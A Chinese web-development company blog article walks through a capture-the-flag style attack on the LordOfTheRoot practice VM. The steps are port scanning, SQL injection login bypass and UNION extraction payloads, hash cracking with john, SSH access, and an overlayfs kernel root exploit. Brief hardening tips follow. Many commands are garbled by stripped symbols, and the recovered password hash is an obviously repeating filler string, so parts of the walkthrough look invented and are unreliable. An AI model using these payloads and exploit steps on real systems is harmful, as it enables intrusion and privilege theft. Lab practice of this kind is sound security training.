尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

LordOfTheRoot靶机渗透测试实战与漏洞分析

LordOfTheRoot靶机渗透测试实战与漏洞分析 1. 靶机环境概述LordOfTheRoot 1.0.1是Vulhub靶场中一个基于Ubuntu系统的渗透测试训练环境模拟了存在多重安全漏洞的Web服务器。这个靶机最显著的特点是采用了魔戒主题的登录界面实际包含SQL注入、权限提升等典型漏洞链。我在本地虚拟机VMware Workstation 16测试时分配2核CPU/4GB内存即可流畅运行。注意建议使用Kali Linux 2023.1作为攻击机其预装的Burp Suite Community 2023.5版本能完美兼容本靶场的漏洞利用2. 初始信息收集2.1 网络扫描与端口探测使用nmap进行全端口扫描的命令如下nmap -sS -p- -T4 192.168.1.103 -oN initial_scan.nmap典型扫描结果会显示22/tcp open ssh1337/tcp open http Apache 2.4.72.2 Web应用指纹识别通过Wappalyzer插件识别到服务器Apache 2.4.7 (Ubuntu)编程语言PHP 5.5.9前端框架jQuery 1.11.1关键发现/978345210/index.php页面存在登录表单页面源代码中发现注释!-- TODO: Remove test credentials before production -- !-- admin:MyPreciousR00t --3. SQL注入漏洞利用3.1 登录绕过攻击使用发现的测试凭证登录失败后在用户名栏尝试经典注入 or 11 --成功绕过登录进入后台可见系统未对输入进行任何过滤。3.2 数据库信息提取通过Burp Suite拦截修改请求使用以下注入语句获取数据库版本admin UNION SELECT 1,version(),3,4 --返回结果显示MySQL 5.5.44版本。3.3 表结构枚举分步执行以下语句获取关键表信息1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schemadatabase() -- 1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_nameusers --发现users表包含username和password字段。4. 权限提升路径4.1 密码哈希破解获取到的密码哈希格式为$1$VQ6a4lq5$X5aZ5J5L5Z5J5L5Z5J5L5使用john破解john --formatmd5crypt hash.txt --wordlist/usr/share/wordlists/rockyou.txt2小时内可破解出明文密码。4.2 SSH横向移动发现服务器开放SSH服务尝试使用破解的凭证登录ssh cracked_user192.168.1.103成功获取普通用户shell。5. 提权至root5.1 内核漏洞检测执行uname -a显示Linux 3.13.0-24-generic内核存在著名的overlayfs本地提权漏洞。5.2 漏洞利用实战下载编译公开的EXPgcc ofs.c -o ofs chmod x ofs ./ofs执行后成功获取root权限可在/root目录下找到flag文件。6. 防御建议输入验证$username mysqli_real_escape_string($conn, $_POST[username]);最小权限原则chmod 750 /var/www/html定期更新apt-get update apt-get upgrade -y7. 常见问题排查注入失败检查确认Burp Suite拦截模式为Intercept is on检查SQL语句中的空格是否被URL编码提权EXP无法运行apt-get install gcc linux-headers-$(uname -r)SSH连接超时ssh -o ConnectTimeout30 -v userip
返回列表